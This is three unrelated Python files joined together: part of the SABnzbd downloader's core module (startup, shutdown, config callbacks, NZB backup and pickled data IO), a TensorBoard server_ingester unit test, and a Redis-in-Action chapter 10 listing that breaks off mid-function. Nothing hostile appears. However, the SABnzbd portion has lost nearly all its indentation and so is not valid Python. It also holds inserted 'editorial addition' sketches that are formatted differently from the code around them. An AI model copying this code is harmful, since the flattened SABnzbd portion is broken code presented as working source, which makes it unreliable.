global __INITIALIZED__, __SHUTTING_DOWN__, LOGFILE, WEBLOGFILE, LOGHANDLER, GUIHANDLER, AMBI_LOCALHOST, WAITEXIT, DAEMON, MY_NAME, MY_FULLNAME, NEW_VERSION, DIR_HOME, DIR_APPDATA, DIR_LCLDATA, DIR_PROG, DIR_INTERFACES, DARWIN, RESTART_REQ
if __INITIALIZED__:
return False
__SHUTTING_DOWN__ = False
# Set global database connection for Web-UI threads
cherrypy.engine.subscribe("start_thread", get_db_connection)
# Paused?
pause_downloader = pause_downloader or cfg.start_paused()
# Clean-up, if requested
if clean_up:
# New admin folder
filesystem.remove_all(cfg.admin_dir.get_path(), "*.sab")
# Optionally wait for "incomplete" to become online
if cfg.wait_for_dfolder():
wait_for_download_folder()
else:
cfg.download_dir.set(cfg.download_dir(), create=True)
cfg.download_dir.set_create(True)
# Set access rights for "incomplete" base folder
filesystem.set_permissions(cfg.download_dir.get_path(), recursive=False)
# If dirscan_dir cannot be created, set a proper value anyway.
# Maybe it's a network path that's temporarily missing.
path = cfg.dirscan_dir.get_path()
if not os.path.exists(path):
filesystem.create_real_path(cfg.dirscan_dir.ident(), "", path, False)
# Set call backs for Config items
cfg.cache_limit.callback(new_limit)
cfg.cherryhost.callback(guard_restart)
cfg.cherryport.callback(guard_restart)
cfg.web_dir.callback(guard_restart)
cfg.web_color.callback(guard_restart)
cfg.username.callback(guard_restart)
cfg.password.callback(guard_restart)
cfg.log_dir.callback(guard_restart)
cfg.https_port.callback(guard_restart)
cfg.https_cert.callback(guard_restart)
cfg.https_key.callback(guard_restart)
cfg.enable_https.callback(guard_restart)
cfg.top_only.callback(guard_top_only)
cfg.pause_on_post_processing.callback(guard_pause_on_pp)
cfg.quota_size.callback(guard_quota_size)
cfg.quota_day.callback(guard_quota_dp)
cfg.quota_period.callback(guard_quota_dp)
cfg.language.callback(guard_language)
cfg.enable_https_verification.callback(guard_https_ver)
guard_https_ver()
# Set cache limit
if not cfg.cache_limit() or (cfg.cache_limit() in ("200M", "450M") and (sabnzbd.WIN32 or sabnzbd.DARWIN)):
cfg.cache_limit.set(misc.get_cache_limit())
ArticleCache.do.new_limit(cfg.cache_limit.get_int())
check_incomplete_vs_complete()
# Set language files
lang.set_locale_info("SABnzbd", DIR_LANGUAGE)
lang.set_language(cfg.language())
sabnzbd.api.clear_trans_cache()
sabnzbd.change_queue_complete_action(cfg.queue_complete(), new=False)
# One time conversion "speedlimit" in schedules.
if not cfg.sched_converted():
schedules = cfg.schedules()
newsched = []
for sched in schedules:
if "speedlimit" in sched:
newsched.append(re.sub(r"(speedlimit \d+)$", r"\1K", sched))
else:
newsched.append(sched)
cfg.schedules.set(newsched)
cfg.sched_converted.set(1)
# Second time schedule conversion
if cfg.sched_converted() != 2:
cfg.schedules.set(["%s %s" % (1, schedule) for schedule in cfg.schedules()])
cfg.sched_converted.set(2)
config.save_config()
# Add hostname to the whitelist
if not cfg.host_whitelist():
cfg.host_whitelist.set(socket.gethostname())
# Do repair if requested
if check_repair_request():
repair = 2
pause_downloader = True
# Initialize threads
rss.init()
paused = BPSMeter.do.read()
NzbQueue()
Downloader(pause_downloader or paused)
Assembler()
PostProcessor()
NzbQueue.do.read_queue(repair)
DirScanner()
Rating()
URLGrabber()
scheduler.init()
if evalSched:
scheduler.analyse(pause_downloader)
logging.info("All processes started")
RESTART_REQ = False
__INITIALIZED__ = True
return True
@synchronized(INIT_LOCK)
def start():
global __INITIALIZED__
if __INITIALIZED__:
logging.debug("Starting postprocessor")
PostProcessor.do.start()
logging.debug("Starting assembler")
Assembler.do.start()
logging.debug("Starting downloader")
Downloader.do.start()
scheduler.start()
logging.debug("Starting dirscanner")
DirScanner.do.start()
Rating.do.start()
logging.debug("Starting urlgrabber")
URLGrabber.do.start()
@synchronized(INIT_LOCK)
def halt():
global __INITIALIZED__, __SHUTTING_DOWN__
if __INITIALIZED__:
logging.info("SABnzbd shutting down...")
__SHUTTING_DOWN__ = True
# Stop the windows tray icon
if sabnzbd.WINTRAY:
sabnzbd.WINTRAY.terminate = True
sabnzbd.zconfig.remove_server()
sabnzbd.directunpacker.abort_all()
rss.stop()
logging.debug("Stopping URLGrabber")
URLGrabber.do.stop()
try:
URLGrabber.do.join()
except:
pass
logging.debug("Stopping rating")
Rating.do.stop()
try:
Rating.do.join()
except:
pass
logging.debug("Stopping dirscanner")
DirScanner.do.stop()
try:
DirScanner.do.join()
except:
pass
# Stop Required Objects
logging.debug("Stopping downloader")
sabnzbd.downloader.stop()
logging.debug("Stopping assembler")
Assembler.do.stop()
try:
Assembler.do.join()
except:
pass
logging.debug("Stopping postprocessor")
PostProcessor.do.stop()
try:
PostProcessor.do.join()
except:
pass
# Save State
try:
save_state()
except:
logging.error(T("Fatal error at saving state"), exc_info=True)
# The Scheduler cannot be stopped when the stop was scheduled.
    # Since all warm-restarts have been removed, it is no longer
    # necessary to stop the scheduler.
# We must tell the scheduler to deactivate.
scheduler.abort()
logging.info("All processes stopped")
__INITIALIZED__ = False
def trigger_restart(timeout=None):
""" Trigger a restart by setting a flag an shutting down CP """
# Sometimes we need to wait a bit to send good-bye to the browser
if timeout:
time.sleep(timeout)
# Add extra arguments
if sabnzbd.downloader.Downloader.do.paused:
sabnzbd.RESTART_ARGS.append("-p")
sys.argv = sabnzbd.RESTART_ARGS
# Stop all services
sabnzbd.halt()
cherrypy.engine.exit()
if sabnzbd.WIN32:
# Remove connection info for faster restart
del_connection_info()
# Leave the harder restarts to the polling in SABnzbd.py
if sabnzbd.WIN_SERVICE or getattr(sys, "frozen", None) == "macosx_app":
sabnzbd.TRIGGER_RESTART = True
else:
# Do the restart right now
cherrypy.engine._do_execv()
##############################################################################
# Misc Wrappers
##############################################################################
def new_limit():
""" Callback for article cache changes """
ArticleCache.do.new_limit(cfg.cache_limit.get_int())
def guard_restart():
""" Callback for config options requiring a restart """
global RESTART_REQ
sabnzbd.RESTART_REQ = True
def guard_top_only():
""" Callback for change of top_only option """
NzbQueue.do.set_top_only(cfg.top_only())
def guard_pause_on_pp():
""" Callback for change of pause-download-on-pp """
if cfg.pause_on_post_processing():
pass # Not safe to idle downloader, because we don't know
# if post-processing is active now
else:
Downloader.do.resume_from_postproc()
def guard_quota_size():
""" Callback for change of quota_size """
BPSMeter.do.change_quota()
def guard_quota_dp():
""" Callback for change of quota_day or quota_period """
scheduler.restart(force=True)
def guard_language():
""" Callback for change of the interface language """
sabnzbd.lang.set_language(cfg.language())
sabnzbd.api.clear_trans_cache()
def set_https_verification(value):
""" Set HTTPS-verification state while returning current setting
False = disable verification
"""
prev = ssl._create_default_https_context == ssl.create_default_context
if value:
ssl._create_default_https_context = ssl.create_default_context
else:
ssl._create_default_https_context = ssl._create_unverified_context
return prev
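# Illustrative sketch (editorial addition, not part of SABnzbd): because
# set_https_verification() returns the previous state, callers can disable
# certificate checking temporarily and restore it afterwards. The helper name
# is hypothetical.
def _example_without_https_verification(func):
    """ Run func() with HTTPS verification disabled, then restore the old setting """
    prev = set_https_verification(False)
    try:
        return func()
    finally:
        set_https_verification(prev)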
def guard_https_ver():
""" Callback for change of https verification """
set_https_verification(cfg.enable_https_verification())
def add_url(url, pp=None, script=None, cat=None, priority=None, nzbname=None):
""" Add NZB based on a URL, attributes optional """
if "http" not in url:
return
if not pp or pp == "-1":
pp = None
if script and script.lower() == "default":
script = None
if cat and cat.lower() == "default":
cat = None
logging.info("Fetching %s", url)
# Add feed name if it came from RSS
msg = T("Trying to fetch NZB from %s") % url
if nzbname:
msg = "%s - %s" % (nzbname, msg)
# Generate the placeholder
future_nzo = NzbQueue.do.generate_future(msg, pp, script, cat, url=url, priority=priority, nzbname=nzbname)
URLGrabber.do.add(url, future_nzo)
return future_nzo.nzo_id
def save_state():
""" Save all internal bookkeeping to disk """
ArticleCache.do.flush_articles()
NzbQueue.do.save()
BPSMeter.do.save()
rss.save()
Rating.do.save()
DirScanner.do.save()
PostProcessor.do.save()
def pause_all():
""" Pause all activities than cause disk access """
global PAUSED_ALL
PAUSED_ALL = True
Downloader.do.pause()
logging.debug("PAUSED_ALL active")
def unpause_all():
""" Resume all activities """
global PAUSED_ALL
PAUSED_ALL = False
Downloader.do.resume()
logging.debug("PAUSED_ALL inactive")
##############################################################################
# NZB Saving Methods
##############################################################################
def backup_exists(filename):
""" Return True if backup exists and no_dupes is set """
path = cfg.nzb_backup_dir.get_path()
return path and os.path.exists(os.path.join(path, filename + ".gz"))
def backup_nzb(filename, data):
""" Backup NZB file """
path = cfg.nzb_backup_dir.get_path()
if path:
save_compressed(path, filename, data)
def save_compressed(folder, filename, data):
""" Save compressed NZB file in folder """
if filename.endswith(".nzb"):
filename += ".gz"
else:
filename += ".nzb.gz"
logging.info("Backing up %s", os.path.join(folder, filename))
try:
# Have to get around the path being put inside the tgz
with open(os.path.join(folder, filename), "wb") as tgz_file:
f = gzip.GzipFile(filename, fileobj=tgz_file)
f.write(encoding.utob(data))
f.flush()
f.close()
except:
logging.error(T("Saving %s failed"), os.path.join(folder, filename))
logging.info("Traceback: ", exc_info=True)
##############################################################################
# Unsynchronized methods
##############################################################################
def add_nzbfile(
nzbfile, pp=None, script=None, cat=None, priority=NORMAL_PRIORITY, nzbname=None, reuse=False, password=None
):
""" Add disk-based NZB file, optional attributes,
'reuse' flag will suppress duplicate detection
"""
if pp and pp == "-1":
pp = None
if script and script.lower() == "default":
script = None
if cat and cat.lower() == "default":
cat = None
if isinstance(nzbfile, str):
# File coming from queue repair
filename = nzbfile
keep = True
else:
# TODO: CherryPy mangles unicode-filenames!
# See https://github.com/cherrypy/cherrypy/issues/1766
filename = encoding.correct_unknown_encoding(nzbfile.filename)
keep = False
if not sabnzbd.WIN32:
        # If a Windows client sends a file to a Unix server, backslashes
        # may be included, so convert them
filename = filename.replace("\\", "/")
filename = os.path.basename(filename)
ext = os.path.splitext(filename)[1]
if ext.lower() in VALID_ARCHIVES:
suffix = ext.lower()
else:
suffix = ".nzb"
logging.info("Adding %s", filename)
if isinstance(nzbfile, str):
path = nzbfile
else:
try:
nzb_file, path = tempfile.mkstemp(suffix=suffix)
os.write(nzb_file, nzbfile.value)
os.close(nzb_file)
except OSError:
logging.error(T("Cannot create temp file for %s"), filename)
logging.info("Traceback: ", exc_info=True)
return None
if ext.lower() in VALID_ARCHIVES:
return process_nzb_archive_file(
filename, path, pp, script, cat, priority=priority, nzbname=nzbname, password=password
)
else:
return process_single_nzb(
filename,
path,
pp,
script,
cat,
priority=priority,
nzbname=nzbname,
keep=keep,
reuse=reuse,
password=password,
)
def enable_server(server):
""" Enable server (scheduler only) """
try:
config.get_config("servers", server).enable.set(1)
except:
logging.warning(T("Trying to set status of non-existing server %s"), server)
return
config.save_config()
Downloader.do.update_server(server, server)
def disable_server(server):
""" Disable server (scheduler only) """
try:
config.get_config("servers", server).enable.set(0)
except:
logging.warning(T("Trying to set status of non-existing server %s"), server)
return
config.save_config()
Downloader.do.update_server(server, server)
def system_shutdown():
""" Shutdown system after halting download and saving bookkeeping """
logging.info("Performing system shutdown")
Thread(target=halt).start()
while __INITIALIZED__:
time.sleep(1.0)
if sabnzbd.WIN32:
powersup.win_shutdown()
elif DARWIN:
powersup.osx_shutdown()
else:
powersup.linux_shutdown()
def system_hibernate():
""" Hibernate system """
logging.info("Performing system hybernation")
if sabnzbd.WIN32:
powersup.win_hibernate()
elif DARWIN:
powersup.osx_hibernate()
else:
powersup.linux_hibernate()
def system_standby():
""" Standby system """
logging.info("Performing system standby")
if sabnzbd.WIN32:
powersup.win_standby()
elif DARWIN:
powersup.osx_standby()
else:
powersup.linux_standby()
def shutdown_program():
""" Stop program after halting and saving """
logging.info("[%s] Performing SABnzbd shutdown", misc.caller_name())
sabnzbd.halt()
cherrypy.engine.exit()
sabnzbd.SABSTOP = True
def restart_program():
""" Restart program (used by scheduler) """
logging.info("Scheduled restart request")
# Just set the stop flag, because stopping CherryPy from
# the scheduler is not reliable
sabnzbd.TRIGGER_RESTART = True
def change_queue_complete_action(action, new=True):
""" Action or script to be performed once the queue has been completed
Scripts are prefixed with 'script_'
When "new" is False, check whether non-script actions are acceptable
"""
global QUEUECOMPLETE, QUEUECOMPLETEACTION, QUEUECOMPLETEARG
_action = None
_argument = None
if "script_" in action:
# all scripts are labeled script_xxx
_action = run_script
_argument = action.replace("script_", "")
elif new or cfg.queue_complete_pers.get():
if action == "shutdown_pc":
_action = system_shutdown
elif action == "hibernate_pc":
_action = system_hibernate
elif action == "standby_pc":
_action = system_standby
elif action == "shutdown_program":
_action = shutdown_program
else:
action = None
else:
action = None
if new:
cfg.queue_complete.set(action or "")
config.save_config()
# keep the name of the action for matching the current select in queue.tmpl
QUEUECOMPLETE = action
QUEUECOMPLETEACTION = _action
QUEUECOMPLETEARG = _argument
def run_script(script):
""" Run a user script (queue complete only) """
command = [os.path.join(cfg.script_dir.get_path(), script)]
if os.path.exists(command[0]):
try:
stup, need_shell, command, creationflags = sabnzbd.newsunpack.build_command(command)
logging.info("Spawning external command %s", command)
subprocess.Popen(
command,
shell=need_shell,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
startupinfo=stup,
creationflags=creationflags,
)
except:
logging.debug("Failed script %s, Traceback: ", script, exc_info=True)
def empty_queues():
""" Return True if queues empty or non-existent """
global __INITIALIZED__
return (not __INITIALIZED__) or (PostProcessor.do.empty() and NzbQueue.do.is_empty())
def keep_awake():
""" If we still have work to do, keep Windows/OSX system awake """
if KERNEL32 or FOUNDATION:
if sabnzbd.cfg.keep_awake():
awake = False
if (not Downloader.do.is_paused() and not NzbQueue.do.is_empty()) or (
not PostProcessor.do.paused and not PostProcessor.do.empty()
):
awake = True
if KERNEL32:
# set ES_SYSTEM_REQUIRED
KERNEL32.SetThreadExecutionState(ctypes.c_int(0x00000001))
else:
sleepless.keep_awake("SABnzbd is busy downloading and/or post-processing")
if not awake and FOUNDATION:
sleepless.allow_sleep()
################################################################################
# Data IO #
################################################################################
def get_new_id(prefix, folder, check_list=None):
""" Return unique prefixed admin identifier within folder
optionally making sure that id is not in the check_list.
"""
for n in range(10000):
try:
if not os.path.exists(folder):
os.makedirs(folder)
fd, path = tempfile.mkstemp("", "SABnzbd_%s_" % prefix, folder)
os.close(fd)
head, tail = os.path.split(path)
if not check_list or tail not in check_list:
return tail
except:
logging.error(T("Failure in tempfile.mkstemp"))
logging.info("Traceback: ", exc_info=True)
break
# Cannot create unique id, crash the process
raise IOError
def save_data(data, _id, path, do_pickle=True, silent=False):
""" Save data to a diskfile """
if not silent:
logging.debug("[%s] Saving data for %s in %s", misc.caller_name(), _id, path)
path = os.path.join(path, _id)
# We try 3 times, to avoid any dict or access problems
for t in range(3):
try:
with open(path, "wb") as data_file:
if do_pickle:
pickle.dump(data, data_file, protocol=pickle.HIGHEST_PROTOCOL)
else:
data_file.write(data)
break
except:
if silent:
# This can happen, probably a removed folder
pass
elif t == 2:
logging.error(T("Saving %s failed"), path)
logging.info("Traceback: ", exc_info=True)
else:
# Wait a tiny bit before trying again
time.sleep(0.1)
def load_data(data_id, path, remove=True, do_pickle=True, silent=False):
""" Read data from disk file """
path = os.path.join(path, data_id)
if not os.path.exists(path):
logging.info("[%s] %s missing", misc.caller_name(), path)
return None
if not silent:
logging.debug("[%s] Loading data for %s from %s", misc.caller_name(), data_id, path)
try:
with open(path, "rb") as data_file:
if do_pickle:
try:
data = pickle.load(data_file, encoding=sabnzbd.encoding.CODEPAGE)
except UnicodeDecodeError:
# Could be Python 2 data that we can load using old encoding
data = pickle.load(data_file, encoding="latin1")
else:
data = data_file.read()
if remove:
filesystem.remove_file(path)
except:
logging.error(T("Loading %s failed"), path)
logging.info("Traceback: ", exc_info=True)
return None
return data
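# Illustrative sketch (editorial addition, not part of SABnzbd): save_data()
# and load_data() form a pickled round trip keyed by an admin id. A
# hypothetical usage with a throw-away folder:
def _example_data_roundtrip():
    folder = tempfile.mkdtemp()
    save_data({"answer": 42}, "example_id", folder)
    # remove=True deletes the disk file again after a successful read
    return load_data("example_id", folder, remove=True)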
def remove_data(_id, path):
""" Remove admin file """
path = os.path.join(path, _id)
try:
if os.path.exists(path):
filesystem.remove_file(path)
except:
logging.debug("Failed to remove %s", path)
def save_admin(data, data_id):
""" Save data in admin folder in specified format """
logging.debug("[%s] Saving data for %s", misc.caller_name(), data_id)
save_data(data, data_id, cfg.admin_dir.get_path())
def load_admin(data_id, remove=False, silent=False):
""" Read data in admin folder in specified format """
logging.debug("[%s] Loading data for %s from %s", misc.caller_name(), data_id)
return load_data(data_id, cfg.admin_dir.get_path(), remove=remove, silent=silent)
def pp_to_opts(pp):
""" Convert numeric processing options to (repair, unpack, delete) """
# Convert the pp to an int
pp = sabnzbd.interface.int_conv(pp)
if pp == 0:
return False, False, False
if pp == 1:
return True, False, False
if pp == 2:
return True, True, False
return True, True, True
def opts_to_pp(repair, unpack, delete):
""" Convert (repair, unpack, delete) to numeric process options """
if repair is None:
return None
pp = 0
if repair:
pp = 1
if unpack:
pp = 2
if delete:
pp = 3
return pp
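# Illustrative sketch (editorial addition, not part of SABnzbd): pp_to_opts()
# and opts_to_pp() are inverses for the meaningful values 0-3. A hypothetical
# self-check:
def _example_pp_roundtrip():
    for pp in (0, 1, 2, 3):
        repair, unpack, delete = pp_to_opts(pp)
        assert opts_to_pp(repair, unpack, delete) == pp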
def request_repair():
""" Request a full repair on next restart """
path = os.path.join(cfg.admin_dir.get_path(), REPAIR_REQUEST)
try:
f = open(path, "w")
f.write("\n")
f.close()
except:
pass
def check_repair_request():
""" Return True if repair request found, remove afterwards """
path = os.path.join(cfg.admin_dir.get_path(), REPAIR_REQUEST)
if os.path.exists(path):
try:
filesystem.remove_file(path)
except:
pass
return True
return False
def check_all_tasks():
""" Check every task and restart safe ones, else restart program
Return True when everything is under control
"""
if __SHUTTING_DOWN__ or not __INITIALIZED__:
return True
# Non-restartable threads, require program restart
if not sabnzbd.PostProcessor.do.isAlive():
logging.info("Restarting because of crashed postprocessor")
return False
if not Downloader.do.isAlive():
logging.info("Restarting because of crashed downloader")
return False
if not Assembler.do.isAlive():
logging.info("Restarting because of crashed assembler")
return False
# Kick the downloader, in case it missed the semaphore
Downloader.do.wakeup()
# Make sure the right servers are active
Downloader.do.check_timers()
# Restartable threads
if not DirScanner.do.isAlive():
logging.info("Restarting crashed dirscanner")
DirScanner.do.__init__()
if not URLGrabber.do.isAlive():
logging.info("Restarting crashed urlgrabber")
URLGrabber.do.__init__()
if not Rating.do.isAlive():
logging.info("Restarting crashed rating")
Rating.do.__init__()
if not sabnzbd.scheduler.sched_check():
logging.info("Restarting crashed scheduler")
sabnzbd.scheduler.init()
sabnzbd.downloader.Downloader.do.unblock_all()
# Check one-shot pause
sabnzbd.scheduler.pause_check()
# Check (and terminate) idle jobs
sabnzbd.nzbqueue.NzbQueue.do.stop_idle_jobs()
return True
def pid_file(pid_path=None, pid_file=None, port=0):
""" Create or remove pid file """
global DIR_PID
if not sabnzbd.WIN32:
if pid_path and pid_path.startswith("/"):
DIR_PID = os.path.join(pid_path, "sabnzbd-%d.pid" % port)
elif pid_file and pid_file.startswith("/"):
DIR_PID = pid_file
if DIR_PID:
try:
if port:
f = open(DIR_PID, "w")
f.write("%d\n" % os.getpid())
f.close()
else:
filesystem.remove_file(DIR_PID)
except:
logging.warning("Cannot access PID file %s", DIR_PID)
def check_incomplete_vs_complete():
""" Make sure "incomplete" and "complete" are not identical """
complete = cfg.complete_dir.get_path()
if filesystem.same_file(cfg.download_dir.get_path(), complete):
if filesystem.real_path("X", cfg.download_dir()) == cfg.download_dir():
# Abs path, so set an abs path too
cfg.download_dir.set(os.path.join(complete, "incomplete"))
else:
cfg.download_dir.set("incomplete")
def wait_for_download_folder():
""" Wait for download folder to become available """
while not cfg.download_dir.test_path():
logging.debug('Waiting for "incomplete" folder')
time.sleep(2.0)
# Required wrapper because nzbstuff.py cannot import downloader.py
def highest_server(me):
return sabnzbd.downloader.Downloader.do.highest_server(me)
def test_ipv6():
""" Check if external IPv6 addresses are reachable """
if not cfg.selftest_host():
# User disabled the test, assume active IPv6
return True
try:
info = getipaddress.addresslookup6(cfg.selftest_host())
except:
logging.debug(
"Test IPv6: Disabling IPv6, because it looks like it's not available. Reason: %s", sys.exc_info()[0]
)
return False
try:
af, socktype, proto, canonname, sa = info[0]
sock = socket.socket(af, socktype, proto)
sock.settimeout(2) # 2 second timeout
sock.connect(sa[0:2])
sock.close()
logging.debug("Test IPv6: IPv6 test successful. Enabling IPv6")
return True
except socket.error:
logging.debug("Test IPv6: Cannot reach IPv6 test host. Disabling IPv6")
return False
except:
logging.debug("Test IPv6: Problem during IPv6 connect. Disabling IPv6. Reason: %s", sys.exc_info()[0])
return False
def test_cert_checking():
""" Test quality of certificate validation """
# User disabled the test, assume proper SSL certificates
if not cfg.selftest_host():
return True
# Try a connection to our test-host
try:
ctx = ssl.create_default_context()
base_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ctx.wrap_socket(base_sock, server_hostname=cfg.selftest_host())
ssl_sock.settimeout(2.0)
ssl_sock.connect((cfg.selftest_host(), 443))
ssl_sock.close()
return True
except (socket.gaierror, socket.timeout):
# Non-SSL related error.
        # We now assume that certificates work instead of forcing
        # lower quality just because of some (temporary) internet problem
logging.info("Could not determine system certificate validation quality due to connection problems")
return True
except:
# Seems something is still wrong
sabnzbd.set_https_verification(False)
return False
def history_updated():
""" To make sure we always have a fresh history """
sabnzbd.LAST_HISTORY_UPDATE += 1
# Never go over the limit
if sabnzbd.LAST_HISTORY_UPDATE + 1 >= sys.maxsize:
sabnzbd.LAST_HISTORY_UPDATE = 1
|
server_ingester_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests for `tensorboard.data.server_ingester`."""
import os
import subprocess
import tempfile
import threading
import time
from unittest import mock
import grpc
from tensorboard import test as tb_test
from tensorboard.data import grpc_provider
from tensorboard.data import server_ingester
from tensorboard.util import grpc_util
class ExistingServerDataIngesterTest(tb_test.TestCase):
def test(self):
addr = "localhost:6806"
with mock.patch.object(grpc, "secure_channel", autospec=True):
ingester = server_ingester.ExistingServerDataIngester(
addr,
channel_creds_type=grpc_util.ChannelCredsType.LOCAL,
)
ingester.start()
self.assertIsInstance(
ingester.data_provider, grpc_provider.GrpcDataProvider
)
class SubprocessServerDataIngesterTest(tb_test.TestCase):
def test(self):
# Create a fake server binary so that the `os.path.exists` check
# passes.
fake_binary_path = os.path.join(self.get_temp_dir(), "server")
with open(fake_binary_path, "wb"):
pass
binary_info = server_ingester.ServerBinary(
fake_binary_path, version=None
)
tmpdir = tempfile.TemporaryDirectory()
self.enter_context(
mock.patch.object(
tempfile, "TemporaryDirectory", return_value=tmpdir
)
)
port_file = os.path.join(tmpdir.name, "port")
error_file = os.path.join(tmpdir.name, "startup_error")
real_popen = subprocess.Popen
# Stub out `subprocess.Popen` to write the port file.
def fake_popen(subprocess_args, *args, **kwargs):
def target():
time.sleep(0.2) # wait one cycle
with open(port_file, "w") as outfile:
outfile.write("23456\n")
result = mock.create_autospec(real_popen, instance=True)
result.stdin = mock.Mock()
result.poll = lambda: None
result.pid = 789
threading.Thread(target=target).start()
return result
tilde_logdir = "~/tmp/logs"
expanded_logdir = os.path.expanduser(tilde_logdir)
self.assertNotEqual(tilde_logdir, expanded_logdir)
with mock.patch.object(subprocess, "Popen", wraps=fake_popen) as popen:
with mock.patch.object(grpc, "secure_channel", autospec=True) as sc:
ingester = server_ingester.SubprocessServerDataIngester(
server_binary=binary_info,
logdir=tilde_logdir,
reload_interval=5,
channel_creds_type=grpc_util.ChannelCredsType.LOCAL,
samples_per_plugin={
"scalars": 500,
"images": 0,
},
)
ingester.start()
self.assertIsInstance(
ingester.data_provider, grpc_provider.GrpcDataProvider
)
expected_args = [
fake_binary_path,
"--logdir=%s" % expanded_logdir,
"--reload=5",
"--samples-per-plugin=scalars=500,images=all",
"--port=0",
"--port-file=%s" % port_file,
"--die-after-stdin",
"--error-file=%s" % error_file,
"--verbose", # logging is enabled in tests
]
popen.assert_called_once_with(expected_args, stdin=subprocess.PIPE)
sc.assert_called_once_with(
"localhost:23456", mock.ANY, options=mock.ANY
)
class ServerInfoTest(tb_test.TestCase):
def test_version_none(self):
b = server_ingester.ServerBinary("./server", version=None)
self.assertTrue(b.at_least_version("0.1.0"))
self.assertTrue(b.at_least_version("999.999.999"))
def test_version_final_release(self):
b = server_ingester.ServerBinary("./server", version="0.4.0")
self.assertTrue(b.at_least_version("0.4.0"))
self.assertFalse(b.at_least_version("0.5.0a0"))
self.assertFalse(b.at_least_version("0.5.0"))
def test_version_prerelease(self):
b = server_ingester.ServerBinary("./server", version="0.5.0a0")
self.assertTrue(b.at_least_version("0.4.0"))
self.assertTrue(b.at_least_version("0.5.0a0"))
self.assertFalse(b.at_least_version("0.5.0"))
if __name__ == "__main__":
tb_test.main()
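# A minimal, hypothetical sketch (not from the TensorBoard codebase) of the
# version-gating behavior that ServerInfoTest exercises above: a None version
# means "built from head" and passes every check, and a prerelease such as
# "0.5.0a0" satisfies ">= 0.4.0" but not ">= 0.5.0".  The real
# ServerBinary.at_least_version implementation may differ.
def _at_least_version_sketch(actual, required):
    if actual is None:
        return True
    def parse(version):
        core, _, pre = version.partition("a")
        parts = tuple(int(x) for x in core.split("."))
        # Final releases get a trailing (1,) so they sort after prereleases.
        return parts + ((0, int(pre)) if pre else (1,))
    return parse(actual) >= parse(required)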
|
ch10_listing_source.py
|
# coding: utf-8
import binascii
from collections import defaultdict
from datetime import date
from decimal import Decimal
import functools
import json
from Queue import Empty, Queue
import threading
import time
import unittest
import uuid
import redis
CONFIGS = {}
CHECKED = {}
def get_config(conn, type, component, wait=1):
key = 'config:%s:%s'%(type, component)
if CHECKED.get(key) < time.time() - wait: #A
CHECKED[key] = time.time() #B
config = json.loads(conn.get(key) or '{}') #C
config = dict((str(k), config[k]) for k in config)
old_config = CONFIGS.get(key) #D
if config != old_config: #E
CONFIGS[key] = config #F
return CONFIGS.get(key)
REDIS_CONNECTIONS = {}
config_connection = None
def redis_connection(component, wait=1): #A
key = 'config:redis:' + component #B
def wrapper(function): #C
@functools.wraps(function) #D
def call(*args, **kwargs): #E
old_config = CONFIGS.get(key, object()) #F
_config = get_config( #G
config_connection, 'redis', component, wait) #G
config = {}
for k, v in _config.iteritems(): #L
config[k.encode('utf-8')] = v #L
if config != old_config: #H
REDIS_CONNECTIONS[key] = redis.Redis(**config) #H
return function( #I
REDIS_CONNECTIONS.get(key), *args, **kwargs) #I
return call #J
return wrapper #K
def index_document(conn, docid, words, scores):
pipeline = conn.pipeline(True)
for word in words: #I
pipeline.sadd('idx:' + word, docid) #I
pipeline.hmset('kb:doc:%s'%docid, scores)
return len(pipeline.execute()) #J
def parse_and_search(conn, query, ttl):
id = str(uuid.uuid4())
conn.sinterstore('idx:' + id,
['idx:'+key for key in query])
conn.expire('idx:' + id, ttl)
return id
def search_and_sort(conn, query, id=None, ttl=300, sort="-updated", #A
start=0, num=20): #A
desc = sort.startswith('-') #B
sort = sort.lstrip('-') #B
by = "kb:doc:*->" + sort #B
alpha = sort not in ('updated', 'id', 'created') #I
if id and not conn.expire(id, ttl): #C
id = None #C
if not id: #D
id = parse_and_search(conn, query, ttl=ttl) #D
pipeline = conn.pipeline(True)
pipeline.scard('idx:' + id) #E
pipeline.sort('idx:' + id, by=by, alpha=alpha, #F
desc=desc, start=start, num=num) #F
results = pipeline.execute()
return results[0], results[1], id #G
def zintersect(conn, keys, ttl):
id = str(uuid.uuid4())
conn.zinterstore('idx:' + id,
dict(('idx:'+k, v) for k,v in keys.iteritems()))
conn.expire('idx:' + id, ttl)
return id
def search_and_zsort(conn, query, id=None, ttl=300, update=1, vote=0, #A
start=0, num=20, desc=True): #A
if id and not conn.expire(id, ttl): #B
id = None #B
if not id: #C
id = parse_and_search(conn, query, ttl=ttl) #C
scored_search = { #D
id: 0, #D
'sort:update': update, #D
'sort:votes': vote #D
}
id = zintersect(conn, scored_search, ttl) #E
pipeline = conn.pipeline(True)
pipeline.zcard('idx:' + id) #F
if desc: #G
pipeline.zrevrange('idx:' + id, start, start + num - 1) #G
else: #G
pipeline.zrange('idx:' + id, start, start + num - 1) #G
results = pipeline.execute()
return results[0], results[1], id #H
def execute_later(conn, queue, name, args):
t = threading.Thread(target=globals()[name], args=tuple(args))
t.setDaemon(1)
t.start()
HOME_TIMELINE_SIZE = 1000
POSTS_PER_PASS = 1000
def shard_key(base, key, total_elements, shard_size): #A
if isinstance(key, (int, long)) or key.isdigit(): #B
shard_id = int(str(key), 10) // shard_size #C
else:
shards = 2 * total_elements // shard_size #D
shard_id = binascii.crc32(key) % shards #E
return "%s:%s"%(base, shard_id) #F
def shard_sadd(conn, base, member, total_elements, shard_size):
shard = shard_key(base,
'x'+str(member), total_elements, shard_size) #A
return conn.sadd(shard, member) #B
SHARD_SIZE = 512
EXPECTED = defaultdict(lambda: 1000000)
# Listing 10-1
# <start id="get-connection"/>
def get_redis_connection(component, wait=1):
    key = 'config:redis:' + component
    # Fetch the old configuration, if any.
    old_config = CONFIGS.get(key, object())
    # Get the new configuration, if any.
    config = get_config(
        config_connection, 'redis', component, wait)
    # If the new and old configurations do not match, create a new connection.
    if config != old_config:
        REDIS_CONNECTIONS[key] = redis.Redis(**config)
